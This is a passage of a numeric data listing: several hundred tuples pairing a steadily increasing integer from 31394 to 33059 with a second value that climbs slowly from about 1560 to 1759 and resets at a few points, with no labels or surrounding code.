(31394, 1615),
(31395, 1615),
(31396, 1615),
(31397, 1615),
(31398, 1615),
(31399, 1616),
(31400, 1616),
(31401, 1616),
(31402, 1616),
(31403, 1616),
(31404, 1616),
(31405, 1617),
(31406, 1617),
(31407, 1617),
(31408, 1617),
(31409, 1617),
(31410, 1617),
(31411, 1617),
(31412, 1617),
(31413, 1617),
(31414, 1618),
(31415, 1618),
(31416, 1618),
(31417, 1618),
(31418, 1618),
(31419, 1618),
(31420, 1619),
(31421, 1619),
(31422, 1619),
(31423, 1619),
(31424, 1619),
(31425, 1619),
(31426, 1620),
(31427, 1620),
(31428, 1620),
(31429, 1620),
(31430, 1620),
(31431, 1620),
(31432, 1621),
(31433, 1621),
(31434, 1621),
(31435, 1621),
(31436, 1621),
(31437, 1621),
(31438, 1622),
(31439, 1622),
(31440, 1622),
(31441, 1622),
(31442, 1622),
(31443, 1622),
(31444, 1623),
(31445, 1623),
(31446, 1623),
(31447, 1623),
(31448, 1623),
(31449, 1623),
(31450, 1624),
(31451, 1624),
(31452, 1624),
(31453, 1624),
(31454, 1624),
(31455, 1624),
(31456, 1625),
(31457, 1625),
(31458, 1625),
(31459, 1625),
(31460, 1625),
(31461, 1625),
(31462, 1626),
(31463, 1626),
(31464, 1626),
(31465, 1626),
(31466, 1626),
(31467, 1626),
(31468, 1627),
(31469, 1627),
(31470, 1627),
(31471, 1627),
(31472, 1627),
(31473, 1627),
(31474, 1628),
(31475, 1628),
(31476, 1628),
(31477, 1628),
(31478, 1628),
(31479, 1628),
(31480, 1629),
(31481, 1629),
(31482, 1629),
(31483, 1629),
(31484, 1629),
(31485, 1629),
(31486, 1630),
(31487, 1630),
(31488, 1630),
(31489, 1630),
(31490, 1630),
(31491, 1630),
(31492, 1631),
(31493, 1631),
(31494, 1631),
(31495, 1631),
(31496, 1631),
(31497, 1631),
(31498, 1632),
(31499, 1632),
(31500, 1632),
(31501, 1632),
(31502, 1632),
(31503, 1632),
(31504, 1633),
(31505, 1633),
(31506, 1633),
(31507, 1633),
(31508, 1633),
(31509, 1633),
(31510, 1633),
(31511, 1633),
(31512, 1633),
(31513, 1634),
(31514, 1634),
(31515, 1634),
(31516, 1634),
(31517, 1634),
(31518, 1634),
(31519, 1635),
(31520, 1635),
(31521, 1635),
(31522, 1635),
(31523, 1635),
(31524, 1635),
(31525, 1636),
(31526, 1636),
(31527, 1636),
(31528, 1636),
(31529, 1636),
(31530, 1636),
(31531, 1637),
(31532, 1637),
(31533, 1637),
(31534, 1637),
(31535, 1637),
(31536, 1637),
(31537, 1638),
(31538, 1638),
(31539, 1638),
(31540, 1638),
(31541, 1638),
(31542, 1638),
(31543, 1639),
(31544, 1639),
(31545, 1639),
(31546, 1639),
(31547, 1639),
(31548, 1639),
(31549, 1640),
(31550, 1640),
(31551, 1640),
(31552, 1640),
(31553, 1640),
(31554, 1640),
(31555, 1641),
(31556, 1641),
(31557, 1641),
(31558, 1641),
(31559, 1641),
(31560, 1641),
(31561, 1642),
(31562, 1642),
(31563, 1642),
(31564, 1642),
(31565, 1642),
(31566, 1642),
(31567, 1643),
(31568, 1643),
(31569, 1643),
(31570, 1643),
(31571, 1643),
(31572, 1643),
(31573, 1644),
(31574, 1644),
(31575, 1644),
(31576, 1644),
(31577, 1644),
(31578, 1644),
(31579, 1645),
(31580, 1645),
(31581, 1645),
(31582, 1645),
(31583, 1645),
(31584, 1645),
(31585, 1646),
(31586, 1646),
(31587, 1646),
(31588, 1646),
(31589, 1646),
(31590, 1646),
(31591, 1647),
(31592, 1647),
(31593, 1647),
(31594, 1647),
(31595, 1647),
(31596, 1647),
(31597, 1648),
(31598, 1648),
(31599, 1648),
(31600, 1648),
(31601, 1648),
(31602, 1648),
(31603, 1649),
(31604, 1649),
(31605, 1649),
(31606, 1649),
(31607, 1649),
(31608, 1649),
(31609, 1649),
(31610, 1649),
(31611, 1649),
(31612, 1650),
(31613, 1650),
(31614, 1650),
(31615, 1650),
(31616, 1650),
(31617, 1650),
(31618, 1651),
(31619, 1651),
(31620, 1651),
(31621, 1651),
(31622, 1651),
(31623, 1651),
(31624, 1652),
(31625, 1652),
(31626, 1652),
(31627, 1652),
(31628, 1652),
(31629, 1652),
(31630, 1653),
(31631, 1653),
(31632, 1653),
(31633, 1653),
(31634, 1653),
(31635, 1653),
(31636, 1654),
(31637, 1654),
(31638, 1654),
(31639, 1654),
(31640, 1654),
(31641, 1654),
(31642, 1655),
(31643, 1655),
(31644, 1655),
(31645, 1655),
(31646, 1655),
(31647, 1655),
(31648, 1656),
(31649, 1656),
(31650, 1656),
(31651, 1656),
(31652, 1656),
(31653, 1656),
(31654, 1657),
(31655, 1657),
(31656, 1657),
(31657, 1657),
(31658, 1657),
(31659, 1657),
(31660, 1658),
(31661, 1658),
(31662, 1658),
(31663, 1658),
(31664, 1658),
(31665, 1658),
(31666, 1659),
(31667, 1659),
(31668, 1659),
(31669, 1659),
(31670, 1659),
(31671, 1659),
(31672, 1560),
(31673, 1560),
(31674, 1561),
(31675, 1561),
(31676, 1562),
(31677, 1562),
(31678, 1563),
(31679, 1563),
(31680, 1564),
(31681, 1564),
(31682, 1565),
(31683, 1565),
(31684, 1566),
(31685, 1566),
(31686, 1567),
(31687, 1567),
(31688, 1568),
(31689, 1568),
(31690, 1569),
(31691, 1570),
(31692, 1570),
(31693, 1571),
(31694, 1571),
(31695, 1572),
(31696, 1572),
(31697, 1573),
(31698, 1573),
(31699, 1574),
(31700, 1574),
(31701, 1575),
(31702, 1575),
(31703, 1576),
(31704, 1576),
(31705, 1577),
(31706, 1577),
(31707, 1578),
(31708, 1578),
(31709, 1579),
(31710, 1579),
(31711, 1580),
(31712, 1580),
(31713, 1581),
(31714, 1581),
(31715, 1582),
(31716, 1582),
(31717, 1583),
(31718, 1583),
(31719, 1584),
(31720, 1584),
(31721, 1585),
(31722, 1586),
(31723, 1586),
(31724, 1587),
(31725, 1587),
(31726, 1588),
(31727, 1588),
(31728, 1589),
(31729, 1589),
(31730, 1590),
(31731, 1590),
(31732, 1591),
(31733, 1591),
(31734, 1592),
(31735, 1592),
(31736, 1593),
(31737, 1593),
(31738, 1594),
(31739, 1594),
(31740, 1595),
(31741, 1595),
(31742, 1596),
(31743, 1596),
(31744, 1597),
(31745, 1597),
(31746, 1598),
(31747, 1598),
(31748, 1599),
(31749, 1599),
(31750, 1600),
(31751, 1600),
(31752, 1601),
(31753, 1602),
(31754, 1602),
(31755, 1603),
(31756, 1603),
(31757, 1604),
(31758, 1604),
(31759, 1605),
(31760, 1605),
(31761, 1606),
(31762, 1606),
(31763, 1607),
(31764, 1607),
(31765, 1608),
(31766, 1608),
(31767, 1609),
(31768, 1609),
(31769, 1610),
(31770, 1610),
(31771, 1611),
(31772, 1611),
(31773, 1612),
(31774, 1612),
(31775, 1613),
(31776, 1613),
(31777, 1614),
(31778, 1614),
(31779, 1615),
(31780, 1615),
(31781, 1616),
(31782, 1616),
(31783, 1617),
(31784, 1618),
(31785, 1618),
(31786, 1619),
(31787, 1619),
(31788, 1620),
(31789, 1620),
(31790, 1621),
(31791, 1621),
(31792, 1622),
(31793, 1622),
(31794, 1623),
(31795, 1623),
(31796, 1624),
(31797, 1624),
(31798, 1625),
(31799, 1625),
(31800, 1626),
(31801, 1626),
(31802, 1627),
(31803, 1627),
(31804, 1628),
(31805, 1628),
(31806, 1629),
(31807, 1629),
(31808, 1630),
(31809, 1630),
(31810, 1631),
(31811, 1631),
(31812, 1632),
(31813, 1632),
(31814, 1633),
(31815, 1634),
(31816, 1634),
(31817, 1635),
(31818, 1635),
(31819, 1636),
(31820, 1636),
(31821, 1637),
(31822, 1637),
(31823, 1638),
(31824, 1638),
(31825, 1639),
(31826, 1639),
(31827, 1640),
(31828, 1640),
(31829, 1641),
(31830, 1641),
(31831, 1642),
(31832, 1642),
(31833, 1643),
(31834, 1643),
(31835, 1644),
(31836, 1644),
(31837, 1645),
(31838, 1645),
(31839, 1646),
(31840, 1646),
(31841, 1647),
(31842, 1647),
(31843, 1648),
(31844, 1648),
(31845, 1649),
(31846, 1650),
(31847, 1650),
(31848, 1651),
(31849, 1651),
(31850, 1652),
(31851, 1652),
(31852, 1653),
(31853, 1653),
(31854, 1654),
(31855, 1654),
(31856, 1655),
(31857, 1655),
(31858, 1656),
(31859, 1656),
(31860, 1657),
(31861, 1657),
(31862, 1658),
(31863, 1658),
(31864, 1659),
(31865, 1659),
(31866, 1660),
(31867, 1661),
(31868, 1662),
(31869, 1663),
(31870, 1664),
(31871, 1665),
(31872, 1666),
(31873, 1667),
(31874, 1668),
(31875, 1669),
(31876, 1670),
(31877, 1671),
(31878, 1672),
(31879, 1673),
(31880, 1674),
(31881, 1675),
(31882, 1676),
(31883, 1677),
(31884, 1678),
(31885, 1679),
(31886, 1680),
(31887, 1681),
(31888, 1682),
(31889, 1683),
(31890, 1684),
(31891, 1685),
(31892, 1686),
(31893, 1687),
(31894, 1688),
(31895, 1689),
(31896, 1690),
(31897, 1691),
(31898, 1692),
(31899, 1693),
(31900, 1694),
(31901, 1695),
(31902, 1696),
(31903, 1697),
(31904, 1698),
(31905, 1699),
(31906, 1700),
(31907, 1701),
(31908, 1702),
(31909, 1703),
(31910, 1704),
(31911, 1705),
(31912, 1706),
(31913, 1707),
(31914, 1708),
(31915, 1709),
(31916, 1710),
(31917, 1711),
(31918, 1712),
(31919, 1713),
(31920, 1714),
(31921, 1715),
(31922, 1716),
(31923, 1717),
(31924, 1718),
(31925, 1719),
(31926, 1720),
(31927, 1721),
(31928, 1722),
(31929, 1723),
(31930, 1724),
(31931, 1725),
(31932, 1726),
(31933, 1727),
(31934, 1728),
(31935, 1729),
(31936, 1730),
(31937, 1731),
(31938, 1732),
(31939, 1733),
(31940, 1734),
(31941, 1735),
(31942, 1736),
(31943, 1737),
(31944, 1738),
(31945, 1739),
(31946, 1740),
(31947, 1741),
(31948, 1742),
(31949, 1743),
(31950, 1744),
(31951, 1745),
(31952, 1746),
(31953, 1747),
(31954, 1748),
(31955, 1749),
(31956, 1750),
(31957, 1751),
(31958, 1752),
(31959, 1753),
(31960, 1754),
(31961, 1755),
(31962, 1756),
(31963, 1757),
(31964, 1758),
(31965, 1759),
(31966, 1660),
(31967, 1661),
(31968, 1662),
(31969, 1662),
(31970, 1662),
(31971, 1662),
(31972, 1663),
(31973, 1664),
(31974, 1665),
(31975, 1665),
(31976, 1665),
(31977, 1665),
(31978, 1666),
(31979, 1666),
(31980, 1667),
(31981, 1668),
(31982, 1669),
(31983, 1669),
(31984, 1670),
(31985, 1671),
(31986, 1672),
(31987, 1672),
(31988, 1673),
(31989, 1674),
(31990, 1675),
(31991, 1675),
(31992, 1676),
(31993, 1677),
(31994, 1678),
(31995, 1678),
(31996, 1679),
(31997, 1680),
(31998, 1681),
(31999, 1681),
(32000, 1682),
(32001, 1683),
(32002, 1683),
(32003, 1684),
(32004, 1685),
(32005, 1686),
(32006, 1686),
(32007, 1687),
(32008, 1688),
(32009, 1689),
(32010, 1689),
(32011, 1690),
(32012, 1691),
(32013, 1692),
(32014, 1692),
(32015, 1693),
(32016, 1694),
(32017, 1695),
(32018, 1695),
(32019, 1696),
(32020, 1697),
(32021, 1697),
(32022, 1698),
(32023, 1699),
(32024, 1699),
(32025, 1700),
(32026, 1701),
(32027, 1702),
(32028, 1702),
(32029, 1703),
(32030, 1704),
(32031, 1705),
(32032, 1705),
(32033, 1706),
(32034, 1707),
(32035, 1708),
(32036, 1708),
(32037, 1709),
(32038, 1710),
(32039, 1711),
(32040, 1711),
(32041, 1712),
(32042, 1713),
(32043, 1713),
(32044, 1714),
(32045, 1715),
(32046, 1716),
(32047, 1716),
(32048, 1716),
(32049, 1717),
(32050, 1718),
(32051, 1719),
(32052, 1719),
(32053, 1719),
(32054, 1720),
(32055, 1721),
(32056, 1722),
(32057, 1722),
(32058, 1722),
(32059, 1723),
(32060, 1724),
(32061, 1725),
(32062, 1725),
(32063, 1725),
(32064, 1726),
(32065, 1727),
(32066, 1728),
(32067, 1728),
(32068, 1728),
(32069, 1729),
(32070, 1729),
(32071, 1729),
(32072, 1730),
(32073, 1730),
(32074, 1731),
(32075, 1732),
(32076, 1733),
(32077, 1733),
(32078, 1734),
(32079, 1735),
(32080, 1736),
(32081, 1736),
(32082, 1737),
(32083, 1738),
(32084, 1739),
(32085, 1739),
(32086, 1740),
(32087, 1741),
(32088, 1742),
(32089, 1742),
(32090, 1743),
(32091, 1744),
(32092, 1745),
(32093, 1745),
(32094, 1746),
(32095, 1747),
(32096, 1747),
(32097, 1747),
(32098, 1748),
(32099, 1749),
(32100, 1750),
(32101, 1750),
(32102, 1750),
(32103, 1751),
(32104, 1752),
(32105, 1753),
(32106, 1753),
(32107, 1753),
(32108, 1754),
(32109, 1755),
(32110, 1756),
(32111, 1756),
(32112, 1756),
(32113, 1757),
(32114, 1758),
(32115, 1759),
(32116, 1759),
(32117, 1759),
(32118, 1660),
(32119, 1660),
(32120, 1660),
(32121, 1660),
(32122, 1660),
(32123, 1660),
(32124, 1660),
(32125, 1661),
(32126, 1661),
(32127, 1661),
(32128, 1661),
(32129, 1661),
(32130, 1661),
(32131, 1661),
(32132, 1662),
(32133, 1662),
(32134, 1662),
(32135, 1662),
(32136, 1662),
(32137, 1662),
(32138, 1662),
(32139, 1663),
(32140, 1663),
(32141, 1663),
(32142, 1663),
(32143, 1663),
(32144, 1663),
(32145, 1663),
(32146, 1664),
(32147, 1664),
(32148, 1664),
(32149, 1664),
(32150, 1664),
(32151, 1664),
(32152, 1664),
(32153, 1665),
(32154, 1665),
(32155, 1665),
(32156, 1665),
(32157, 1665),
(32158, 1665),
(32159, 1665),
(32160, 1665),
(32161, 1665),
(32162, 1665),
(32163, 1665),
(32164, 1666),
(32165, 1666),
(32166, 1666),
(32167, 1666),
(32168, 1666),
(32169, 1666),
(32170, 1666),
(32171, 1667),
(32172, 1667),
(32173, 1667),
(32174, 1667),
(32175, 1667),
(32176, 1667),
(32177, 1667),
(32178, 1668),
(32179, 1668),
(32180, 1668),
(32181, 1668),
(32182, 1668),
(32183, 1668),
(32184, 1668),
(32185, 1669),
(32186, 1669),
(32187, 1669),
(32188, 1669),
(32189, 1669),
(32190, 1669),
(32191, 1669),
(32192, 1670),
(32193, 1670),
(32194, 1670),
(32195, 1670),
(32196, 1670),
(32197, 1670),
(32198, 1670),
(32199, 1671),
(32200, 1671),
(32201, 1671),
(32202, 1671),
(32203, 1671),
(32204, 1671),
(32205, 1671),
(32206, 1672),
(32207, 1672),
(32208, 1672),
(32209, 1672),
(32210, 1672),
(32211, 1672),
(32212, 1672),
(32213, 1673),
(32214, 1673),
(32215, 1673),
(32216, 1673),
(32217, 1673),
(32218, 1673),
(32219, 1673),
(32220, 1674),
(32221, 1674),
(32222, 1674),
(32223, 1674),
(32224, 1674),
(32225, 1674),
(32226, 1674),
(32227, 1675),
(32228, 1675),
(32229, 1675),
(32230, 1675),
(32231, 1675),
(32232, 1675),
(32233, 1675),
(32234, 1676),
(32235, 1676),
(32236, 1676),
(32237, 1676),
(32238, 1676),
(32239, 1676),
(32240, 1676),
(32241, 1677),
(32242, 1677),
(32243, 1677),
(32244, 1677),
(32245, 1677),
(32246, 1677),
(32247, 1677),
(32248, 1678),
(32249, 1678),
(32250, 1678),
(32251, 1678),
(32252, 1678),
(32253, 1678),
(32254, 1678),
(32255, 1679),
(32256, 1679),
(32257, 1679),
(32258, 1679),
(32259, 1679),
(32260, 1679),
(32261, 1679),
(32262, 1680),
(32263, 1680),
(32264, 1680),
(32265, 1680),
(32266, 1680),
(32267, 1680),
(32268, 1680),
(32269, 1681),
(32270, 1681),
(32271, 1681),
(32272, 1681),
(32273, 1681),
(32274, 1681),
(32275, 1681),
(32276, 1681),
(32277, 1681),
(32278, 1681),
(32279, 1681),
(32280, 1682),
(32281, 1682),
(32282, 1682),
(32283, 1682),
(32284, 1682),
(32285, 1682),
(32286, 1682),
(32287, 1683),
(32288, 1683),
(32289, 1683),
(32290, 1683),
(32291, 1683),
(32292, 1683),
(32293, 1683),
(32294, 1684),
(32295, 1684),
(32296, 1684),
(32297, 1684),
(32298, 1684),
(32299, 1684),
(32300, 1684),
(32301, 1685),
(32302, 1685),
(32303, 1685),
(32304, 1685),
(32305, 1685),
(32306, 1685),
(32307, 1685),
(32308, 1686),
(32309, 1686),
(32310, 1686),
(32311, 1686),
(32312, 1686),
(32313, 1686),
(32314, 1686),
(32315, 1687),
(32316, 1687),
(32317, 1687),
(32318, 1687),
(32319, 1687),
(32320, 1687),
(32321, 1687),
(32322, 1688),
(32323, 1688),
(32324, 1688),
(32325, 1688),
(32326, 1688),
(32327, 1688),
(32328, 1688),
(32329, 1689),
(32330, 1689),
(32331, 1689),
(32332, 1689),
(32333, 1689),
(32334, 1689),
(32335, 1689),
(32336, 1690),
(32337, 1690),
(32338, 1690),
(32339, 1690),
(32340, 1690),
(32341, 1690),
(32342, 1690),
(32343, 1691),
(32344, 1691),
(32345, 1691),
(32346, 1691),
(32347, 1691),
(32348, 1691),
(32349, 1691),
(32350, 1692),
(32351, 1692),
(32352, 1692),
(32353, 1692),
(32354, 1692),
(32355, 1692),
(32356, 1692),
(32357, 1693),
(32358, 1693),
(32359, 1693),
(32360, 1693),
(32361, 1693),
(32362, 1693),
(32363, 1693),
(32364, 1694),
(32365, 1694),
(32366, 1694),
(32367, 1694),
(32368, 1694),
(32369, 1694),
(32370, 1694),
(32371, 1695),
(32372, 1695),
(32373, 1695),
(32374, 1695),
(32375, 1695),
(32376, 1695),
(32377, 1695),
(32378, 1696),
(32379, 1696),
(32380, 1696),
(32381, 1696),
(32382, 1696),
(32383, 1696),
(32384, 1696),
(32385, 1697),
(32386, 1697),
(32387, 1697),
(32388, 1697),
(32389, 1697),
(32390, 1697),
(32391, 1697),
(32392, 1697),
(32393, 1697),
(32394, 1697),
(32395, 1697),
(32396, 1698),
(32397, 1698),
(32398, 1698),
(32399, 1698),
(32400, 1698),
(32401, 1698),
(32402, 1698),
(32403, 1699),
(32404, 1699),
(32405, 1699),
(32406, 1699),
(32407, 1699),
(32408, 1699),
(32409, 1699),
(32410, 1700),
(32411, 1700),
(32412, 1700),
(32413, 1700),
(32414, 1700),
(32415, 1700),
(32416, 1700),
(32417, 1701),
(32418, 1701),
(32419, 1701),
(32420, 1701),
(32421, 1701),
(32422, 1701),
(32423, 1701),
(32424, 1702),
(32425, 1702),
(32426, 1702),
(32427, 1702),
(32428, 1702),
(32429, 1702),
(32430, 1702),
(32431, 1703),
(32432, 1703),
(32433, 1703),
(32434, 1703),
(32435, 1703),
(32436, 1703),
(32437, 1703),
(32438, 1704),
(32439, 1704),
(32440, 1704),
(32441, 1704),
(32442, 1704),
(32443, 1704),
(32444, 1704),
(32445, 1705),
(32446, 1705),
(32447, 1705),
(32448, 1705),
(32449, 1705),
(32450, 1705),
(32451, 1705),
(32452, 1706),
(32453, 1706),
(32454, 1706),
(32455, 1706),
(32456, 1706),
(32457, 1706),
(32458, 1706),
(32459, 1707),
(32460, 1707),
(32461, 1707),
(32462, 1707),
(32463, 1707),
(32464, 1707),
(32465, 1707),
(32466, 1708),
(32467, 1708),
(32468, 1708),
(32469, 1708),
(32470, 1708),
(32471, 1708),
(32472, 1708),
(32473, 1709),
(32474, 1709),
(32475, 1709),
(32476, 1709),
(32477, 1709),
(32478, 1709),
(32479, 1709),
(32480, 1710),
(32481, 1710),
(32482, 1710),
(32483, 1710),
(32484, 1710),
(32485, 1710),
(32486, 1710),
(32487, 1711),
(32488, 1711),
(32489, 1711),
(32490, 1711),
(32491, 1711),
(32492, 1711),
(32493, 1711),
(32494, 1712),
(32495, 1712),
(32496, 1712),
(32497, 1712),
(32498, 1712),
(32499, 1712),
(32500, 1712),
(32501, 1713),
(32502, 1713),
(32503, 1713),
(32504, 1713),
(32505, 1713),
(32506, 1713),
(32507, 1713),
(32508, 1713),
(32509, 1713),
(32510, 1713),
(32511, 1713),
(32512, 1714),
(32513, 1714),
(32514, 1714),
(32515, 1714),
(32516, 1714),
(32517, 1714),
(32518, 1714),
(32519, 1715),
(32520, 1715),
(32521, 1715),
(32522, 1715),
(32523, 1715),
(32524, 1715),
(32525, 1715),
(32526, 1716),
(32527, 1716),
(32528, 1716),
(32529, 1716),
(32530, 1716),
(32531, 1716),
(32532, 1716),
(32533, 1717),
(32534, 1717),
(32535, 1717),
(32536, 1717),
(32537, 1717),
(32538, 1717),
(32539, 1717),
(32540, 1718),
(32541, 1718),
(32542, 1718),
(32543, 1718),
(32544, 1718),
(32545, 1718),
(32546, 1718),
(32547, 1719),
(32548, 1719),
(32549, 1719),
(32550, 1719),
(32551, 1719),
(32552, 1719),
(32553, 1719),
(32554, 1720),
(32555, 1720),
(32556, 1720),
(32557, 1720),
(32558, 1720),
(32559, 1720),
(32560, 1720),
(32561, 1721),
(32562, 1721),
(32563, 1721),
(32564, 1721),
(32565, 1721),
(32566, 1721),
(32567, 1721),
(32568, 1722),
(32569, 1722),
(32570, 1722),
(32571, 1722),
(32572, 1722),
(32573, 1722),
(32574, 1722),
(32575, 1723),
(32576, 1723),
(32577, 1723),
(32578, 1723),
(32579, 1723),
(32580, 1723),
(32581, 1723),
(32582, 1724),
(32583, 1724),
(32584, 1724),
(32585, 1724),
(32586, 1724),
(32587, 1724),
(32588, 1724),
(32589, 1725),
(32590, 1725),
(32591, 1725),
(32592, 1725),
(32593, 1725),
(32594, 1725),
(32595, 1725),
(32596, 1726),
(32597, 1726),
(32598, 1726),
(32599, 1726),
(32600, 1726),
(32601, 1726),
(32602, 1726),
(32603, 1727),
(32604, 1727),
(32605, 1727),
(32606, 1727),
(32607, 1727),
(32608, 1727),
(32609, 1727),
(32610, 1728),
(32611, 1728),
(32612, 1728),
(32613, 1728),
(32614, 1728),
(32615, 1728),
(32616, 1728),
(32617, 1729),
(32618, 1729),
(32619, 1729),
(32620, 1729),
(32621, 1729),
(32622, 1729),
(32623, 1729),
(32624, 1729),
(32625, 1729),
(32626, 1729),
(32627, 1729),
(32628, 1730),
(32629, 1730),
(32630, 1730),
(32631, 1730),
(32632, 1730),
(32633, 1730),
(32634, 1730),
(32635, 1731),
(32636, 1731),
(32637, 1731),
(32638, 1731),
(32639, 1731),
(32640, 1731),
(32641, 1731),
(32642, 1732),
(32643, 1732),
(32644, 1732),
(32645, 1732),
(32646, 1732),
(32647, 1732),
(32648, 1732),
(32649, 1733),
(32650, 1733),
(32651, 1733),
(32652, 1733),
(32653, 1733),
(32654, 1733),
(32655, 1733),
(32656, 1734),
(32657, 1734),
(32658, 1734),
(32659, 1734),
(32660, 1734),
(32661, 1734),
(32662, 1734),
(32663, 1735),
(32664, 1735),
(32665, 1735),
(32666, 1735),
(32667, 1735),
(32668, 1735),
(32669, 1735),
(32670, 1736),
(32671, 1736),
(32672, 1736),
(32673, 1736),
(32674, 1736),
(32675, 1736),
(32676, 1736),
(32677, 1737),
(32678, 1737),
(32679, 1737),
(32680, 1737),
(32681, 1737),
(32682, 1737),
(32683, 1737),
(32684, 1738),
(32685, 1738),
(32686, 1738),
(32687, 1738),
(32688, 1738),
(32689, 1738),
(32690, 1738),
(32691, 1739),
(32692, 1739),
(32693, 1739),
(32694, 1739),
(32695, 1739),
(32696, 1739),
(32697, 1739),
(32698, 1740),
(32699, 1740),
(32700, 1740),
(32701, 1740),
(32702, 1740),
(32703, 1740),
(32704, 1740),
(32705, 1741),
(32706, 1741),
(32707, 1741),
(32708, 1741),
(32709, 1741),
(32710, 1741),
(32711, 1741),
(32712, 1742),
(32713, 1742),
(32714, 1742),
(32715, 1742),
(32716, 1742),
(32717, 1742),
(32718, 1742),
(32719, 1743),
(32720, 1743),
(32721, 1743),
(32722, 1743),
(32723, 1743),
(32724, 1743),
(32725, 1743),
(32726, 1744),
(32727, 1744),
(32728, 1744),
(32729, 1744),
(32730, 1744),
(32731, 1744),
(32732, 1744),
(32733, 1745),
(32734, 1745),
(32735, 1745),
(32736, 1745),
(32737, 1745),
(32738, 1745),
(32739, 1745),
(32740, 1745),
(32741, 1745),
(32742, 1745),
(32743, 1745),
(32744, 1746),
(32745, 1746),
(32746, 1746),
(32747, 1746),
(32748, 1746),
(32749, 1746),
(32750, 1746),
(32751, 1747),
(32752, 1747),
(32753, 1747),
(32754, 1747),
(32755, 1747),
(32756, 1747),
(32757, 1747),
(32758, 1748),
(32759, 1748),
(32760, 1748),
(32761, 1748),
(32762, 1748),
(32763, 1748),
(32764, 1748),
(32765, 1749),
(32766, 1749),
(32767, 1749),
(32768, 1749),
(32769, 1749),
(32770, 1749),
(32771, 1749),
(32772, 1750),
(32773, 1750),
(32774, 1750),
(32775, 1750),
(32776, 1750),
(32777, 1750),
(32778, 1750),
(32779, 1751),
(32780, 1751),
(32781, 1751),
(32782, 1751),
(32783, 1751),
(32784, 1751),
(32785, 1751),
(32786, 1752),
(32787, 1752),
(32788, 1752),
(32789, 1752),
(32790, 1752),
(32791, 1752),
(32792, 1752),
(32793, 1753),
(32794, 1753),
(32795, 1753),
(32796, 1753),
(32797, 1753),
(32798, 1753),
(32799, 1753),
(32800, 1754),
(32801, 1754),
(32802, 1754),
(32803, 1754),
(32804, 1754),
(32805, 1754),
(32806, 1754),
(32807, 1755),
(32808, 1755),
(32809, 1755),
(32810, 1755),
(32811, 1755),
(32812, 1755),
(32813, 1755),
(32814, 1756),
(32815, 1756),
(32816, 1756),
(32817, 1756),
(32818, 1756),
(32819, 1756),
(32820, 1756),
(32821, 1757),
(32822, 1757),
(32823, 1757),
(32824, 1757),
(32825, 1757),
(32826, 1757),
(32827, 1757),
(32828, 1758),
(32829, 1758),
(32830, 1758),
(32831, 1758),
(32832, 1758),
(32833, 1758),
(32834, 1758),
(32835, 1759),
(32836, 1759),
(32837, 1759),
(32838, 1759),
(32839, 1759),
(32840, 1759),
(32841, 1759),
(32842, 1660),
(32843, 1661),
(32844, 1662),
(32845, 1663),
(32846, 1664),
(32847, 1665),
(32848, 1666),
(32849, 1667),
(32850, 1668),
(32851, 1669),
(32852, 1670),
(32853, 1671),
(32854, 1672),
(32855, 1673),
(32856, 1674),
(32857, 1675),
(32858, 1676),
(32859, 1677),
(32860, 1678),
(32861, 1679),
(32862, 1680),
(32863, 1681),
(32864, 1682),
(32865, 1683),
(32866, 1684),
(32867, 1685),
(32868, 1686),
(32869, 1687),
(32870, 1688),
(32871, 1689),
(32872, 1690),
(32873, 1691),
(32874, 1692),
(32875, 1693),
(32876, 1694),
(32877, 1695),
(32878, 1696),
(32879, 1697),
(32880, 1698),
(32881, 1699),
(32882, 1700),
(32883, 1701),
(32884, 1702),
(32885, 1703),
(32886, 1704),
(32887, 1705),
(32888, 1706),
(32889, 1707),
(32890, 1708),
(32891, 1709),
(32892, 1710),
(32893, 1711),
(32894, 1712),
(32895, 1713),
(32896, 1714),
(32897, 1715),
(32898, 1716),
(32899, 1717),
(32900, 1718),
(32901, 1719),
(32902, 1720),
(32903, 1721),
(32904, 1722),
(32905, 1723),
(32906, 1724),
(32907, 1725),
(32908, 1726),
(32909, 1727),
(32910, 1728),
(32911, 1729),
(32912, 1730),
(32913, 1731),
(32914, 1732),
(32915, 1733),
(32916, 1734),
(32917, 1735),
(32918, 1736),
(32919, 1737),
(32920, 1738),
(32921, 1739),
(32922, 1740),
(32923, 1741),
(32924, 1742),
(32925, 1743),
(32926, 1744),
(32927, 1745),
(32928, 1746),
(32929, 1747),
(32930, 1748),
(32931, 1749),
(32932, 1750),
(32933, 1751),
(32934, 1752),
(32935, 1753),
(32936, 1754),
(32937, 1755),
(32938, 1756),
(32939, 1757),
(32940, 1758),
(32941, 1759),
(32942, 1660),
(32943, 1660),
(32944, 1660),
(32945, 1660),
(32946, 1660),
(32947, 1660),
(32948, 1661),
(32949, 1661),
(32950, 1661),
(32951, 1661),
(32952, 1661),
(32953, 1661),
(32954, 1662),
(32955, 1662),
(32956, 1662),
(32957, 1662),
(32958, 1662),
(32959, 1662),
(32960, 1663),
(32961, 1663),
(32962, 1663),
(32963, 1663),
(32964, 1663),
(32965, 1663),
(32966, 1664),
(32967, 1664),
(32968, 1664),
(32969, 1664),
(32970, 1664),
(32971, 1664),
(32972, 1665),
(32973, 1665),
(32974, 1665),
(32975, 1665),
(32976, 1665),
(32977, 1665),
(32978, 1665),
(32979, 1665),
(32980, 1665),
(32981, 1666),
(32982, 1666),
(32983, 1666),
(32984, 1666),
(32985, 1666),
(32986, 1666),
(32987, 1667),
(32988, 1667),
(32989, 1667),
(32990, 1667),
(32991, 1667),
(32992, 1667),
(32993, 1668),
(32994, 1668),
(32995, 1668),
(32996, 1668),
(32997, 1668),
(32998, 1668),
(32999, 1669),
(33000, 1669),
(33001, 1669),
(33002, 1669),
(33003, 1669),
(33004, 1669),
(33005, 1670),
(33006, 1670),
(33007, 1670),
(33008, 1670),
(33009, 1670),
(33010, 1670),
(33011, 1671),
(33012, 1671),
(33013, 1671),
(33014, 1671),
(33015, 1671),
(33016, 1671),
(33017, 1672),
(33018, 1672),
(33019, 1672),
(33020, 1672),
(33021, 1672),
(33022, 1672),
(33023, 1673),
(33024, 1673),
(33025, 1673),
(33026, 1673),
(33027, 1673),
(33028, 1673),
(33029, 1674),
(33030, 1674),
(33031, 1674),
(33032, 1674),
(33033, 1674),
(33034, 1674),
(33035, 1675),
(33036, 1675),
(33037, 1675),
(33038, 1675),
(33039, 1675),
(33040, 1675),
(33041, 1676),
(33042, 1676),
(33043, 1676),
(33044, 1676),
(33045, 1676),
(33046, 1676),
(33047, 1677),
(33048, 1677),
(33049, 1677),
(33050, 1677),
(33051, 1677),
(33052, 1677),
(33053, 1678),
(33054, 1678),
(33055, 1678),
(33056, 1678),
(33057, 1678),
(33058, 1678),
(33059, 1679),
